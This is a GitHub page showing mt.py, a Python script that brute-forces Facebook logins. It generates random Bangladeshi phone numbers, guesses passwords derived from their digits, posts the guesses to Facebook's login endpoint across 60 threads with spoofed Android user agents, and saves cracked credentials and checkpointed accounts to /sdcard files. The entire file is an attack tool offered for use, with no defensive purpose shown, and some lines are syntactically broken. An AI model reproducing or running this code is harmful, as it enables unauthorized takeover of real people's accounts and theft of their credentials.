-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathmt.py
More file actions
135 lines (132 loc) · 5.11 KB
/
mt.py
File metadata and controls
135 lines (132 loc) · 5.11 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
import os,time,sys
os.system('clear')
from os import path
import os,base64,zlib,pip,urllib
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
try:
import os,requests,json,time,re,random,sys,uuid,string,subprocess
from string import *
from concurrent.futures import ThreadPoolExecutor as tred
except ModuleNotFoundError:
os.system(f'pip install requests futures==2 > /dev/null')
except:pass
logo = """ \033[1;92
_ _
/\/\ ___ | |_(_)_ __
/ \ / _ \| __| | '_ \
/ /\/\ \ (_) | |_| | | | |
\/ \/\___/ \__|_|_| |_|
"""
ok = [❤️]
cp = [🥺]
id = []
session = requests.Session()
user = []
loop = 0
oks = []
cps = []
loop = 0
ugen=[]
for ua in range(1000):
a='Mozilla/5.0 (Linux; Android'
b=random.choice(['12' , '13' , '14' , '15'])
c='SM-A125U Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
d=random.randrange(40,100)
e='0'
f=random.randrange(3000,6000)
g=random.randrange(20,100)
h='Mobile Safari/537.36'
ug=(f"{a} {b}; {c}{d}.{e}.{f}.{g} {h}")
ugen.append(ug)
def Main():
os.system('clear')
print(logo)
print("<> BD SIM CODE : [017 018 019 013 015 016] ")
love = input('<> SELECT : ')
print('<> EXAMPLE : [1000,5000,10000,15000,20000] ')
limit = int(input('<> LIMIT : '))
for nmbr in range(limit):
lova = ''.join(random.choice(string.digits) for _ in range(2))
lovb = ''.join(random.choice(string.digits) for _ in range(2))
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with tred(max_workers=60) as turag:
os.system('clear')
print(logo)
tl = str(len(user))
print('<> CHOICE CODE : '+love)
print('<> TOTAL ID : '+tl)
print('<> CRACK STARTED....... ')
print(50*'━')
for guru in user:
uid = love+lova+lovb+guru
pwx = [lova+lovb+guru,love+lova+lovb,love+love]
turag.submit(test,uid,pwx,tl)
print(50*'━')
print(' <> CRACK DONE......... ')
print(50*'━')
exit()
def test(uid,pwx,tl):
global loop
global cps
global oks
global agents
try:
for ps in pwx:
session = requests.Session()
sys.stdout.write(f'\r\033[1;90m[\033[1;92m\033[1;90mMotin] \033[1;96m%s/%s\033[1;90m \033[1;90m[\033[1;92mOK:%s\033[1;90m] '%(loop,tl,len(oks))),
sys.stdout.flush()
pro = random.choice(ugen)
free_fb = session.get('https://m.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {'authority': 'p.facebook.com',
'method': 'GET',
'path': '/login/device-based/login/async/',
'scheme': 'https',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
'sec-ch-prefers-color-scheme': 'light',
'sec-ch-ua': '"Not:A-Brand";v="99", "Chromium";v="112"',
'sec-ch-ua-full-version-list': '"Not:A-Brand";v="99.0.0.0", "Chromium";v="112.0.5615.137"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-ch-ua-platform-version': '"12.0.0"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': pro}
lo = session.post('https://www.facebook.com/login/device-based/regular/login/?refsrc',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f'\r\33[1;92m[Cyber-OK] '+cid+' ¤ '+ps+'\33[0;92m')
oks.append(cid)
open('/sdcard/Cyber-ok.txt', 'a').write(cid+' | '+ps+' | '+uid+'\n')
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[65:80]
print(f"\r\33[1;92m[Cyber-CP] {uid} ¤ {ps}")
open('/sdcard/cyber-CP.txt', 'a').write( uid+' | '+ps+' \n')
cps.append(uid)
break
else:
continue
loop+=1
except:
pass
Main()